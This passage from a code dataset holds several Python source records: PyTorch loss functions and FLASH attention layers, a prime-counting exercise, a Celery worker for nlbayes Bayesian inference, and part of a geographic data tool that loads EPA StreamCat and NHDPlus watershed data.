Y]\n w = ((1+(lab_pre-Y).abs())**self.gama).float()\n w = (w/w.sum()).reshape(-1)\n return (-w*torch.log(P)).sum()\n\nclass PairWiseRankingLoss(nn.Module):\n def __init__(self, gama=1):\n super(PairWiseRankingLoss, self).__init__()\n self.gama = gama\n def forward(self, Y_logit, Y):\n # Y_logit, Y: batchSize1 × batchSize2;\n Y_pre = F.sigmoid(Y_logit)\n loss,cnt = 0,0\n for y_pre,y in zip(Y_pre,Y):\n # batchSize2\n neg = y_pre[y==0].unsqueeze(dim=1) # negNum × 1\n pos = y_pre[y==1].unsqueeze(dim=0) # 1 × posNum\n tmp = self.gama+(neg-pos) # => negNum × posNum\n tmp[tmp<0] = 0\n loss += tmp.sum()\n cnt += tmp.shape[0]*tmp.shape[1]\n return loss\n\nclass MultiLabelCircleLoss(nn.Module):\n def __init__(self):\n super(MultiLabelCircleLoss, self).__init__()\n def forward(self, Y_logit, Y):\n loss,cnt = 0,0\n for yp,yt in zip(Y_logit,Y):\n neg = yp[yt==0]\n pos = yp[yt==1]\n loss += torch.log(1+torch.exp(neg).sum()) + torch.log(1+torch.exp(-pos).sum())\n #loss += torch.log(1+(F.sigmoid(neg)**2*torch.exp(neg)).sum()) + torch.log(1+((1-F.sigmoid(pos))**2*torch.exp(-pos)).sum())\n #loss += len(yp) * (torch.log(1+torch.exp(neg).sum()/len(neg)) + torch.log(1+torch.exp(-pos).sum()/len(pos)))\n cnt += 1\n return loss/cnt\n\n'''\nimport torch\nfrom nnLayer import *\nY = torch.tensor([0,2], dtype=torch.long)\nY_logit = torch.tensor([[0.1,0.9,1],[0.6,2,0.4]], dtype=torch.float32)\nCCEL = ContinusCrossEntropyLoss()\nCCEL(Y_logit, Y)\n'''\n\nclass MultiTaskCEL(nn.Module):\n def __init__(self, lossBalanced=True, ageW=1, genderW=1, name='MTCEL'):\n super(MultiTaskCEL, self).__init__()\n self.genderCriterion,self.ageCriterion = nn.CrossEntropyLoss(),nn.CrossEntropyLoss()#ContinusCrossEntropyLoss()#\n self.genderS,self.ageS = nn.Parameter(torch.zeros(1,dtype=torch.float), requires_grad=lossBalanced),nn.Parameter(torch.zeros(1,dtype=torch.float), requires_grad=lossBalanced)\n self.lossBalanced = lossBalanced\n self.name = name\n self.ageW,self.genderW = ageW,genderW\n def forward(self, genderY_logit, genderY, ageY_logit, ageY):\n if self.lossBalanced:\n return self.genderW * torch.exp(-self.genderS) * self.genderCriterion(genderY_logit,genderY) + self.ageW * torch.exp(-self.ageS) * self.ageCriterion(ageY_logit,ageY) + (self.genderS+self.ageS)/2\n else:\n return self.genderW * self.genderCriterion(genderY_logit,genderY) + self.ageW * self.ageCriterion(ageY_logit,ageY)\n\n\ndef truncated_normal_(tensor,mean=0,std=0.09):\n with torch.no_grad():\n size = tensor.shape\n tmp = tensor.new_empty(size+(4,)).normal_()\n valid = (tmp < 2) & (tmp > -2)\n ind = valid.max(-1, keepdim=True)[1]\n tensor.data.copy_(tmp.gather(-1, ind).squeeze(-1))\n tensor.data.mul_(std).add_(mean)\n return tensor\n\n\ndef padding_to_multiple_of(n, mult):\n remainder = n % mult\n if remainder == 0:\n return 0\n return mult - remainder\n\n\ndef rope_flash(x,axis):\n # axis = [1,2]\n shape = list(x.shape)\n if isinstance(axis, int):\n axis = [axis]\n spatial_shape = [shape[i] for i in axis]\n total_len = 1\n for i in spatial_shape:\n total_len *= i\n \n position = torch.reshape(torch.tensor(np.arange(total_len),dtype=torch.float32,device=x.device),spatial_shape)\n \n for i in range(axis[-1] + 1, len(shape)-1, 1):\n position = position.unsqueeze(dim=-1)\n \n half_size = shape[-1] // 2\n freq_seq = torch.tensor(np.arange(half_size),dtype=torch.float32,device=x.device)/float(half_size)\n inv_freq = 10000 ** -freq_seq\n sinusoid = einsum('...,d-> ...d', position, inv_freq)\n sin = torch.sin(sinusoid)\n cos = torch.cos(sinusoid)\n \n x1, x2 = x.chunk(2, dim=-1)\n return torch.cat([ x1 * cos- x2 * sin, x2 * cos + x1 * sin ], dim=-1)\n\n\nclass rel_pos_bias(nn.Module):\n def __init__(self, name='rel_pos_bias'):\n super(rel_pos_bias, self).__init__()\n # rel_pos_bias\n self.a = nn.Parameter(torch.ones(128))\n self.b = nn.Parameter(torch.ones(128))\n truncated_normal_(self.a, std = 0.02)\n truncated_normal_(self.b, std = 0.02)\n self.name = name\n\n def forward(self, c):\n a = rope_flash(self.a[None,:].repeat(c, 1),axis=0)\n b = rope_flash(self.b[None,:].repeat(c, 1),axis=0)\n t = einsum('mk,nk-> mn', a, b)\n return t\n\n# class flash_linear_trans(nn.Module):\n# def __init__(self, embSize, seqMaxLen, chunk_length,trans_s,index_layer, expansion_factor=2,shift_tokens=True):\n# super(flash_linear_trans, self).__init__()\n# self.expansion_factor = expansion_factor\n# self.seqMaxLen = seqMaxLen\n# self.s = trans_s\n# self.e = embSize * self.expansion_factor # e e=2d\n# self.chunk_length = chunk_length # 分块 划分为 num_chunks = n/c 个长度为chunk_length(c)的块\n \n# self.UV = nn.Linear(embSize, expansion_factor * embSize * 2 + trans_s) # 这是单独建立e*d,e*d,s*d的简便写法\n# truncated_normal_(self.UV.weight, std=0.02)\n\n# self.gamma = nn.Parameter(torch.ones(4, trans_s))\n# self.beta = nn.Parameter(torch.zeros(4, trans_s))\n# truncated_normal_(self.gamma, std = 0.02)\n# # self.out_2d = nn.Linear(self.e, self.e) \n# if (index_layer>0):\n# self.out = nn.Linear(self.e, self.e)\n# self.layerNorm = nn.LayerNorm(embSize*2)\n# else: \n# self.out = nn.Linear(self.e, embSize)\n# self.layerNorm = nn.LayerNorm(embSize)\n# truncated_normal_(self.out.weight, std=0.02)\n \n# #self.layerNorm = RMSNorm()\n# self.actFun = nn.SiLU()\n# self.actFun_ReLU = nn.ReLU()\n# self.shift_tokens = shift_tokens\n# self.dropout = nn.Dropout(p=0.1)\n# self.dropout02 = nn.Dropout(p=0.2)\n# self.rel_pos_bias = rel_pos_bias()\n\n# self.index_layer = index_layer\n\n# def forward(self, input, prev=None):\n# # input => batchSize × seqLen × embSize\n# # 分块\n# # 分成 batchSize × numChunks(g) × chunkLength(c) × embSize(d) \n# if self.shift_tokens:\n# x_shift, x_pass = input.chunk(2, dim = -1)\n# x_shift = F.pad(x_shift, (0, 0, 1, -1), value = 0.)\n# x = torch.cat((x_shift, x_pass), dim = -1) \n\n# padding = padding_to_multiple_of(self.seqMaxLen, self.chunk_length)\n\n# if padding>0:\n# x = F.pad(x, ( 0, 0, 0, padding))\n\n# num_chunks = int(x.shape[1]/self.chunk_length)\n\n# chunks = torch.chunk(x, num_chunks, dim=1)\n\n# x = torch.cat([chunks[i].unsqueeze(1) for i in range(len(chunks))], dim=1) # bgcd\n\n# _, g, c, d = list(x.shape) # g表示n/c,即 num_chunks, d 表示 embeddingSize\n \n# U, V, base = torch.split(self.actFun(self.UV(x)), [self.e, self.e, self.s],dim=-1) # => base=Z : bgcs V: bgce\n\n# base = einsum('...r, hr-> ...hr', base, self.gamma)+self.beta\n\n# base = rope_flash(base, axis=[1,2])\n\n# quad_q, quad_k, lin_q, lin_k = torch.chunk(base, 4, dim=-2)\n# quad_q = torch.squeeze(quad_q, dim=3)\n# quad_k = torch.squeeze(quad_k, dim=3)\n# lin_q = torch.squeeze(lin_q, dim=3)\n# lin_k = torch.squeeze(lin_k, dim=3)\n\n# bias = self.rel_pos_bias(c)\n# if prev is not None:\n# attn = torch.matmul(quad_q, quad_k.transpose(2, 3))/ self.s**0.5 + bias + prev\n# else:\n# attn = torch.matmul(quad_q, quad_k.transpose(2, 3))/ self.s**0.5 + bias \n# # # bias = self.rel_pos_bias(c)\n# # if prev is not None:\n# # attn = torch.matmul(quad_q, quad_k.transpose(2, 3))/ self.s**0.5 + prev\n# # else:\n# # attn = torch.matmul(quad_q, quad_k.transpose(2, 3))/ self.s**0.5 \n# prev = attn\n# A = F.softmax(prev,dim=-1)\n# A = self.dropout(A) \n# quadratic = torch.matmul(A, V) # quadratic => bgce\n\n# lin_kv = torch.matmul(lin_k.transpose(2,3),V)\n# linear = torch.matmul(lin_q,lin_kv) /self.seqMaxLen # linear => bgce\n\n# U,quadratic, linear = map(lambda t: rearrange(t, 'b g n d -> b (g n) d')[:, :self.seqMaxLen], (U,quadratic, linear))\n# x = self.out(U * (quadratic+linear))\n \n# if(self.index_layer>0): #第二层\n# # x = self.out_2d(U * (quadratic+linear))\n# x = self.layerNorm(self.dropout(x)) # x => batchSize × SeqLen × [embSize*2]\n# else:\n# # GAU #第一层\n# # x = self.out(U * (quadratic+linear))\n# # Post Norm\n# x = self.layerNorm(input + self.dropout(x)) # x => batchSize × SeqLen × embSize\n# return x, prev\n\n\n# class FLASHLayer(nn.Module):\n# def __init__(self,embSize,seqMaxLen,chunk_length,trans_s,index_layer):\n# super(FLASHLayer, self).__init__()\n# self.flash_linear_trans = flash_linear_trans(embSize,seqMaxLen,chunk_length,trans_s,index_layer)\n\n# def forward(self, input,prev):\n# # x: batchSize × seqLen × embSize\n# x,prev = self.flash_linear_trans(input,prev)\n# return x,prev # => batchSize × seqLen × embSize\n\n\n# class FLASH(nn.Module): # 这里的feaSize = embeddingSize\n# def __init__(self, seqMaxLen, embSize, numLayers, chunk_length,trans_s,name='FLASH'):\n# super(FLASH, self).__init__()\n# self.FLASHLayers = nn.Sequential(\n# OrderedDict([\n# ('FLASHLayer_%d'%i, FLASHLayer(embSize, seqMaxLen,chunk_length,trans_s,i)) for i in range(numLayers)\n# ])\n# )\n# self.name = name\n \n# def forward(self, x):\n# # x: batchSize × seqLen × feaSize\n# prev = None\n# for lay in self.FLASHLayers:\n# x, prev = lay(x, prev=prev)\n# return x # => batchSize × seqLen × feaSize\n\n\nclass flash_linear_trans(nn.Module):\n def __init__(self, embSize, seqMaxLen, chunk_length, trans_s, expansion_factor=2, s=300, shift_tokens=True):\n super(flash_linear_trans, self).__init__()\n self.expansion_factor = expansion_factor\n self.seqMaxLen = seqMaxLen\n self.s = trans_s\n self.e = embSize * self.expansion_factor # e e=2d\n self.chunk_length = chunk_length # 分块 划分为 num_chunks = n/c 个长度为chunk_length(c)的块\n \n self.UV = nn.Linear(embSize, expansion_factor * embSize * 2 + trans_s) # 这是单独建立e*d,e*d,s*d的简便写法\n truncated_normal_(self.UV.weight, std=0.02)\n\n self.gamma = nn.Parameter(torch.ones(4, trans_s))\n self.beta = nn.Parameter(torch.zeros(4, trans_s))\n truncated_normal_(self.gamma, std = 0.02)\n \n self.out = nn.Linear(self.e, embSize)\n truncated_normal_(self.out.weight, std=0.02)\n \n self.layerNorm = nn.LayerNorm(embSize)\n #self.layerNorm = RMSNorm()\n self.actFun = nn.SiLU()\n self.actFun_ReLU = nn.ReLU()\n self.shift_tokens = shift_tokens\n self.dropout = nn.Dropout(p=0.1)\n self.dropout02 = nn.Dropout(p=0.2)\n self.rel_pos_bias = rel_pos_bias()\n\n def forward(self, input, prev=None):\n # input => batchSize × seqLen × embSize\n # 分块\n # 分成 batchSize × numChunks(g) × chunkLength(c) × embSize(d) \n if self.shift_tokens:\n x_shift, x_pass = input.chunk(2, dim = -1)\n x_shift = F.pad(x_shift, (0, 0, 1, -1), value = 0.)\n x = torch.cat((x_shift, x_pass), dim = -1) \n\n padding = padding_to_multiple_of(self.seqMaxLen, self.chunk_length)\n\n if padding>0:\n x = F.pad(x, ( 0, 0, 0, padding))\n\n num_chunks = int(x.shape[1]/self.chunk_length)\n\n chunks = torch.chunk(x, num_chunks, dim=1)\n\n x = torch.cat([chunks[i].unsqueeze(1) for i in range(len(chunks))], dim=1) # bgcd\n\n _, g, c, d = list(x.shape) # g表示n/c,即 num_chunks, d 表示 embeddingSize\n \n U, V, base = torch.split(self.actFun(self.UV(x)), [self.e, self.e, self.s],dim=-1) # => base=Z : bgcs V: bgce\n\n base = einsum('...r, hr-> ...hr', base, self.gamma)+self.beta\n\n base = rope_flash(base, axis=[1,2])\n\n quad_q, quad_k, lin_q, lin_k = torch.chunk(base, 4, dim=-2)\n quad_q = torch.squeeze(quad_q, dim=3)\n quad_k = torch.squeeze(quad_k, dim=3)\n lin_q = torch.squeeze(lin_q, dim=3)\n lin_k = torch.squeeze(lin_k, dim=3)\n\n bias = self.rel_pos_bias(c)\n if prev is not None:\n attn = torch.matmul(quad_q, quad_k.transpose(2, 3))/ self.s**0.5 + bias + prev\n else:\n attn = torch.matmul(quad_q, quad_k.transpose(2, 3))/ self.s**0.5 + bias \n prev = attn\n A = F.softmax(prev,dim=-1)\n A = self.dropout(A) \n quadratic = torch.matmul(A, V) # quadratic => bgce\n\n lin_kv = torch.matmul(lin_k.transpose(2,3),V)\n linear = torch.matmul(lin_q,lin_kv) /self.seqMaxLen # linear => bgce\n\n U,quadratic, linear = map(lambda t: rearrange(t, 'b g n d -> b (g n) d')[:, :self.seqMaxLen], (U,quadratic, linear))\n \n # GAU\n x = self.out(U * (quadratic+linear))\n \n # Post Norm\n \n x = self.layerNorm(input + self.dropout(x)) # x => batchSize × SeqLen × embSize\n return x, prev\n\n\nclass FLASHLayer(nn.Module):\n def __init__(self,embSize,seqMaxLen,chunk_length,trans_s):\n super(FLASHLayer, self).__init__()\n self.flash_linear_trans = flash_linear_trans(embSize,seqMaxLen,chunk_length,trans_s)\n\n def forward(self, input,prev):\n # x: batchSize × seqLen × embSize\n x,prev = self.flash_linear_trans(input,prev)\n return x,prev # => batchSize × seqLen × embSize\n\n\nclass FLASH(nn.Module): # 这里的feaSize = embeddingSize\n def __init__(self, seqMaxLen, embSize, numLayers, chunk_length, trans_s, name='FLASH'):\n super(FLASH, self).__init__()\n self.FLASHLayers = nn.Sequential(\n OrderedDict([\n ('FLASHLayer_%d'%i, FLASHLayer(embSize, seqMaxLen, chunk_length, trans_s)) for i in range(numLayers)\n ])\n )\n self.name = name\n \n def forward(self, x):\n # x: batchSize × seqLen × feaSize\n prev = None\n for lay in self.FLASHLayers:\n x, prev = lay(x, prev=prev)\n return x # => batchSize × seqLen × feaSize\n","repo_name":"CSUBioGroup/RetrieveICD","sub_path":"nnLayer.py","file_name":"nnLayer.py","file_ext":"py","file_size_in_byte":57855,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"6481385072","text":"def changeNumber(n, k):\n res = \"\"\n while 0 < n:\n res = str(n % k) + res\n n //= k\n return res\n\ndef isPrime(n):\n if n == 1: return False\n for i in range(2, int(n ** 0.5) + 1):\n if n % i == 0:\n return False\n return True\n\ndef solution(n, k):\n answer = 0\n res = changeNumber(n, k)\n temp = \"\"\n for i in range(len(res)):\n if res[i] != '0':\n temp += res[i]\n else:\n if temp != \"\" and isPrime(int(temp)):\n answer += 1\n temp = \"\"\n if temp != \"\" and isPrime(int(temp)):\n answer += 1\n return answer\n\nprint(solution(437674, 3))\nprint(solution(110011, 10))","repo_name":"maltepoo/algorithm","sub_path":"PROGRAMMERS/lv.2/k진수에서 소수 개수 구하기.py","file_name":"k진수에서 소수 개수 구하기.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"28735372928","text":"import json\nfrom datetime import datetime\nfrom hashlib import sha256\nimport os\nimport socket\n\nbroker = os.environ['NLB_QUEUE_BROKER']\nbackend = os.environ['NLB_QUEUE_BACKEND']\nmongo_url = os.environ['NLB_DATA_STORE']\n\nfrom celery import Celery\nfrom pymongo import MongoClient\nimport gridfs\nfrom bson.objectid import ObjectId\n\nfrom nlbayes import ModelORNOR\n\n\nclass NLBayesFS:\n def __init__(self, mongo_client) -> None:\n gfs_db = mongo_client.nlbayes_gfs_db\n self.gfs = gridfs.GridFS(gfs_db)\n\n def save_file(self, filebytes, filename):\n hash = sha256(filebytes).hexdigest()\n\n if not self.gfs.exists(_id=hash):\n self.gfs.put(filebytes, _id=hash, filename=filename)\n else:\n file = self.gfs.find_one({'_id': hash})\n if filename != file.filename:\n raise ValueError('filename is different')\n\n return hash\n\n def load_file(self, hash):\n\n file = self.gfs.find_one({'_id': hash})\n return file.read()\n\n\nworker = Celery('nlbayes_jobs', backend=backend, broker=broker)\n@worker.task(bind=True, name=\"ornor_inference\")\ndef taskModelORNOR(self, job_id):\n mongo_client = MongoClient(mongo_url)\n jobs = mongo_client.nlbayes_job_db.jobs\n fs = NLBayesFS(mongo_client)\n\n query = {'_id': ObjectId(job_id)}\n job = jobs.find_one(query)\n\n network_hash = job['network_hash']\n evidence_hash = job['evidence_hash']\n config = job['config']\n\n network = json.loads(fs.load_file(network_hash))\n evidence = json.loads(fs.load_file(evidence_hash))\n model = ModelORNOR(network, evidence, **config)\n\n start_time = datetime.now()\n meta = { 'job_id': job_id,\n 'worker_id': socket.gethostname(),\n 'start_time': start_time.isoformat(), }\n jobs.update_one(query, {\"$set\": {'meta': meta}}, upsert=False)\n\n converged = False\n self.update_state(state=\"BURNIN\", meta=meta)\n while not converged:\n status = model.sample_n(20, 5, 5.0, False, True)\n converged = status == 0\n\n current_time = datetime.now()\n elapsed_time = current_time - start_time\n progress = { 'n_sampled': model.total_sampled,\n 'gr_stat': model.get_max_gelman_rubin(), \n 'elapsed_time': str(elapsed_time), }\n meta.update(progress)\n self.update_state(state=\"BURNIN\", meta=meta)\n\n model.burn_stats()\n\n N = 10000\n converged = False\n self.update_state(state=\"SAMPLING\", meta=meta)\n while model.total_sampled < N and not converged:\n n = min(20, N - model.total_sampled)\n status = model.sample_n(n, 5, 1.15, False, True)\n converged = status == 0\n\n current_time = datetime.now()\n elapsed_time = current_time - start_time\n progress = { 'n_sampled': model.total_sampled,\n 'gr_stat': model.get_max_gelman_rubin(),\n 'elapsed_time': str(elapsed_time), }\n meta.update(progress)\n self.update_state(state=\"SAMPLING\", meta=meta)\n\n meta.update({'end_time': current_time.isoformat()})\n self.update_state(state=\"COMPLETE\", meta=meta)\n\n posterior = { 'X': model.get_posterior_mean_stat('X', 1),\n 'T': model.get_posterior_mean_stat('T', 0), }\n posterior_b = json.dumps(posterior).encode()\n posterior_hash = fs.save_file(posterior_b, 'posterior.json')\n\n data = { 'meta': meta,\n 'posterior_hash': posterior_hash, }\n jobs.update_one(query, {\"$set\": data}, upsert=False)\n\n mongo_client.close()\n\n return data\n","repo_name":"umbibio/nlbayes-app","sub_path":"worker/nlbayes_tasks.py","file_name":"nlbayes_tasks.py","file_ext":"py","file_size_in_byte":3547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"25084658420","text":"import traceback\n#import geopandas as gpd\nimport requests\nimport json,pickle\nimport os\nimport multiprocessing as mp\nimport numpy as np\nimport html\nimport logging, logging.handlers\nimport re\nfrom copy import deepcopy\nfrom random import shuffle\nfrom mylogger import myLogger\nfrom sqlitedict import SqliteDict\nimport zlib, pickle, sqlite3\n\nclass GeogTool(myLogger):\n def __init__(self,sc_data_dir=None):\n myLogger.__init__(self,name='GeogTool.log')\n self.logger.info('starting GeogTool logger')\n self.cwd=os.getcwd()\n try: self.geogdatadir\n except:\n self.geogdatadir=os.path.join(os.getcwd(),'NHDplus_data')\n self.NHDplus_path=os.path.join(self.geogdatadir,'NHDplus')\n self.huc12comiddict_path=os.path.join(self.geogdatadir,'huc12comiddict')\n self.NHDdbf_path=os.path.join(self.geogdatadir,'HUC12_PU_COMIDs_CONUS.dbf')\n self.NHDhuchuc_path=os.path.join(self.geogdatadir,'NHDhuchuc')\n self.failed_SC_comid_path=os.path.join('data_tool','failedSCcomidlist')\n if sc_data_dir is None:\n try: self.sc_data_dir\n except: \n localpath=os.path.join(self.cwd,'../../../hdd3','sc_data')\n if os.path.exists(localpath):\n self.sc_data_dir=localpath\n else:\n networkpath=os.path.join('o:','public','streamcat','sc_data')\n if os.path.exists(networkpath):\n self.sc_data_dir=networkpath\n else:\n self.sc_data_dir=None\n self.logger.error('cannot locate streamcat data. proceeding')\n #assert False, 'cannot locate local streamcat data'\n else: self.sc_data_dir=sc_data_dir\n print(\"streamcat data directory:\",self.sc_data_dir)\n #self.reverse_huc12comid() # this will build most/all of the NHDplus related files if they don't exist\n \n def my_encode(self,obj):\n return sqlite3.Binary(zlib.compress(pickle.dumps(obj, pickle.HIGHEST_PROTOCOL),level=9))\n def my_decode(self,obj):\n return pickle.loads(zlib.decompress(bytes(obj)))\n #mydict = SqliteDict('./my_db.sqlite', encode=self.my_encode, decode=self.my_decode)\n \n def anyNameDB(self,dbname,tablename='data',folder=None):\n name=dbname+'.sqlite'\n if folder:\n path=os.path.join(folder,name)\n else:\n path=name\n return SqliteDict(\n filename=path,tablename=tablename,)\n #encode=self.my_encode,decode=self.my_decode)\n \n def addtoDB(self,dict_to_save,path):\n with self.anyNameDB(path) as db:\n for key,val in dict_to_save.items():\n db[key]=val\n db.commit()\n\n \n def getpickle(self,path):\n with open(path,'rb') as f:\n thefile=pickle.load(f)\n return thefile\n \n def savepickle(self,obj,path):\n with open(path,'wb') as f:\n pickle.dump(obj,f)\n \n \n def savejson(self,thing,path):\n while os.path.exists(path):\n path=path[:-5]+'_1.json'\n with open(path,'w') as f:\n json.dump(thing,f)\n return\n \n def openjson(self,path):\n with open(path,'r') as f:\n thing=json.load(f)\n return thing \n \n def getstreamcat(self,comidlist,process=1,local=1,add_huc12=1):\n #url = \"https://ofmpub.epa.gov/waters10/streamcat.jsonv25?pcomid={}&pLandscapeMetricType=Topography\"\n url = \"https://ofmpub.epa.gov/waters10/streamcat.jsonv25?pcomid={}\"\n #url=\"https://ofmpub.epa.gov/waters10/Watershed_Characterization.Control?pComID={}\"\n if type(comidlist) is str:\n comidlist=[comidlist]\n comidcount=len(comidlist)\n comidlist_datadict={}\n \n if local:\n comidlist_datadict=self.pullStreamCatForComidList(comidlist,add_huc12=add_huc12)\n else:\n for idx,comid in enumerate(comidlist):\n self.logger.info(f'starting {idx}/{comidcount}')\n result=requests.get(url.format(str(comid)))\n self.logger.info(f'retrieved {idx}/{comidcount}')\n success=0\n self.logger.info(f'type(result):{type(result)}')\n try:\n data=result.text\n try:\n comiddatadict=json.loads(data)\n except:\n self.logger.exception(f'failed to json.loads. comid:{comid}')\n datadict={'fail':data}\n except:\n self.logger.exception(f'failed to result.text. comid:{comid}')\n self.logger.debug(f'{data}')\n comiddatadict=result\n comidlist_datadict[str(comid)]=comiddatadict\n #infodict={'streamcatdata':comidlist_datadict}\n if process:\n streamcatdict=self.processStreamCat(comidlist_datadict)\n return streamcatdict\n else: \n return comidlist_datadict\n \n \n def processStreamCat(self,streamcatdata,collapse=1):\n try:\n if type(streamcatdata) is str:\n self.logger.debug(f'streamcatdata type is a str: {streamcatdata}')\n streamcatdata=self.anyNameDB(streamcatdata)\n outdict={}\n error_dict={}\n for comid,data in streamcatdata.items():\n collapse_dict={}\n error_dict[comid]={}\n metricdict={'Ws':{},'Cat':{},'CatRp100':{},'WsRp100':{},'Rp100':{},'other':{}}\n metadict=None\n mkeylist=[*metricdict] #the keys or mkeys\n #print('mkeylist',mkeylist)\n keylengths=[len(key) for key in mkeylist]\n keycount=len(mkeylist)\n regex_y2k=re.compile('20[0-9][0-9]')\n #nlcd_regex_y2k=re.compile('nlcd20[0-9][0-9]')\n #metrics=[*data]\n \n for metric,data_pt in data.items():\n \n srch_y=re.search(regex_y2k,metric)\n if srch_y:\n yr=metric[srch_y.start():srch_y.end()]\n metric_drop_yr=metric[:srch_y.start()]+metric[srch_y.end():]+'_avg'\n else:\n metric_drop_yr=metric\n yr='all'\n if collapse:\n try:\n try:\n float_data_pt=float(data_pt)\n except:\n if len(data_pt)==0 or data_pt=='NA':\n float_data_pt=np.nan\n else: \n float(data_pt)#force error\n if not metric_drop_yr in collapse_dict:\n collapse_dict[metric_drop_yr]=[float_data_pt]\n else:\n collapse_dict[metric_drop_yr].append(float_data_pt)\n except:\n if not metric in error_dict[comid]:\n error_dict[comid][metric]=[data_pt]\n else:\n error_dict[comid][metric].append(data_pt)\n else:\n for k in range(keycount-1):\n endstring=metric[-keylengths[k]:]\n #self.logger.critical(f'endstring:{endstring} for metric:{metric}')\n if endstring==mkeylist[k]:\n mkey=mkeylist[k]\n break\n if k==keycount-2:\n mkey='other'\n if not yr in metricdict[mkey]:\n metricdict[mkey][yr]={}\n metricdict[mkey][yr][metric]=data_pt\n \n if collapse:\n #many of these are just divided by 1\n outdict[comid]={metric:sum(val)/len(val) for metric,val in collapse_dict.items()}\n \n else:\n outdict[comid]=metricdict\n self.logger.exception(f'float error_dict:{error_dict}')\n return outdict\n except:\n self.logger.exception('streamcat error') \n \n def filterfailedcomids(self,comidlist):\n try:previously_failed_comids=self.anyNameDB(self.failed_SC_comid_path)['failed']\n except KeyError:\n self.logger.info(f'\"failed\" key not found in failed SC db')\n return comidlist\n except:\n assert False, 'unexpected error'\n comidlist=[comid for comid in comidlist if not comid in previously_failed_comids]\n return comidlist\n \n def addfailed(self,comidlist):\n with self.anyNameDB(self.failed_SC_comid_path) as db:\n try:previously_failed_comids=db['failed']\n except KeyError: previously_failed_comids={}\n except:assert False,'unexpected error'\n comiddict=dict.fromkeys([*previously_failed_comids.keys(),*comidlist])\n db['failed']=comiddict#just a dict for fast searching\n db.commit()\n return\n \n \n \n def pullStreamCatForComidList(self,comidlist,meta=0,error_lookup=0,add_huc12=1):\n try:self.rvrs_huc12comiddict\n except: self.reverse_huc12comid()\n comidlist=self.filterfailedcomids(comidlist)\n if len(comidlist)==0:\n self.logger.info(f'geogtool has only previously failed comids. returning empty dict')\n return {}\n #try: self.huchuc\n #except:self.build_huchuc()\n pathlist=[path for path in os.listdir(self.sc_data_dir) if path[-5:]=='.json']\n SCoutdict={}\n assert type(comidlist) is list, f'expecting list got {type(comidlist)}'\n comiddict={}\n huc12list=[]\n \"\"\"if type(comidlist[0]) is str:\n self.logger.debug(f'converting comids from string to int')\n comidlist=[int(comid) for comid in comidlist]\"\"\"\n failed_comids=[]\n new_comidlist=[]\n huc8dict={}\n for comid in comidlist:\n try:\n huc8=self.rvrs_huc12comiddict[comid][:8]\n if not huc8 in huc8dict:\n huc8dict[huc8]=[comid]\n else:\n huc8dict[huc8].append(comid)\n except:\n failed_comids.append(comid)\n self.logger.warning(f'no huc12 for comid:{comid}')\n \n huc8_errordict={} \n found=0\n fail=0\n for huc8,comids in huc8dict.items():\n huc8_errordict[huc8]=[]\n path=self.pathfromhuc8(huc8) # no group by for faster load\n if meta: path=path[:-5]+'_meta.json'\n try:\n huc8scdata=self.openjson(path)\n for comid in comids:\n #self.logger.info(f'comid:{comid}')\n comiddata=None\n try:\n comiddata=huc8scdata[int(comid)] # streamcat is not yet a string comid in the data\n except KeyError:\n try:\n\n comiddata=huc8scdata[comid]\n \n except KeyError:\n\n self.logger.info(f'could not find streamcat as str or int for huc8:{huc8},comid:{comid}')#,huc8scdata:{huc8scdata}')\n if error_lookup:\n \n message=self.checkNHDPlus(comid)\n self.logger.critical(message) \n except:\n assert False, 'halt, unexpected error'\n except:\n assert False, 'halt, unexpected error'\n if not comiddata is None:\n found+=1\n self.logger.info(f'streamcat data found for comid:{comid}')\n if add_huc12:\n comiddata['HUC12']=self.rvrs_huc12comiddict[comid]\n comiddict[comid]=comiddata # comid as a string\n else:\n failed_comids.append(comid)\n huc8_errordict[huc8].append(comid)\n fail+=1\n except: \n self.logger.exception(f'Streamcat problem for huc8:{huc8}')\n self.addfailed(failed_comids)\n self.logger.info(f'huc8_errordict:{huc8_errordict}')\n self.logger.info(f'counts for found:{found} and fail:{fail}')\n return comiddict\n \n\n def pathfromhuc8(self,huc8):\n try:\n self.pathtool\n except:\n import streamcat_unzip_tool as sct\n self.pathtool=sct.SCDataTool(sc_data_dir=self.sc_data_dir,groupby_huc8=0).makeSCHucSavePath\n return self.pathtool(huc8)\n \n \n def gethuc12comiddict(self):\n try: \n huc12comiddict=self.huc12comiddict\n return huc12comiddict\n except AttributeError:\n self.logger.info('huc12comiddict not in memory, building...')\n except:\n self.logger.exception(f'unexpected error getting huc12comiddict')\n assert False, 'unexpected error!'\n try: \n huc12comiddict_path=self.huc12comiddict_path\n self.huc12comiddict=self.anyNameDB(huc12comiddict_path)\n self.logger.info(f'opening {self.huc12comiddict_path} with length:{len(self.huc12comiddict)} and type:{type(self.huc12comiddict)}')\n except: \n self.logger.exception(f\"{self.huc12comiddict_path} exists but could not open, rebuilding\")\n self.buildNHDplus()\n \n return self.huc12comiddict\n \n \n def selectRandComidByHuc(self, comid_count=10000, huc2list=None, huc8count=None, huc8list=None, seed=0, evenshare=1):\n try: self.huc12comiddict\n except: self.gethuc12comiddict()\n try:\n huchuc=self.huchuc\n except:\n try:\n huchuc=self.anyNameDB(self.NHDhuchuc_path)\n except:\n huchuc=self.build_huchuc()\n huc2_huc8dict=huchuc['huc2_huc8dict']\n huc8_huc12dict=huchuc['huc8_huc12dict'] \n \n if huc2list is None: \n huc2list=[huc2 for huc2 in huc2_huc8dict if huc2 !='No']\n \n \n huc2count=len(huc2list)\n if huc8list is None:\n if huc8count is None: huc8count=500\n \n huc2_huc8count=max([1,int(huc8count/huc2count)])\n huc8count=huc2_huc8count*len(huc2list)\n if evenshare:\n huc2huc8comid_dict={}\n for huc2 in huc2list:\n huc2huc8comid_dict[huc2]={}\n huc8list=self.select_random_huc8(count=huc2_huc8count, huc2list=[huc2],seed=seed, evenshare=evenshare)\n huc8comidcount=max([1,int(comid_count/(huc2count*len(huc8list)))])\n huc8comidselect=[]\n for huc8 in huc8list:\n \n huc8comidlist=[]\n huc12list=huc8_huc12dict[huc8]\n for huc12 in huc12list:\n huc8comidlist.extend(self.huc12comiddict[huc12])\n shuffle(huc8comidlist)\n huc8comidselect.extend(huc8comidlist[:huc8comidcount]) \n 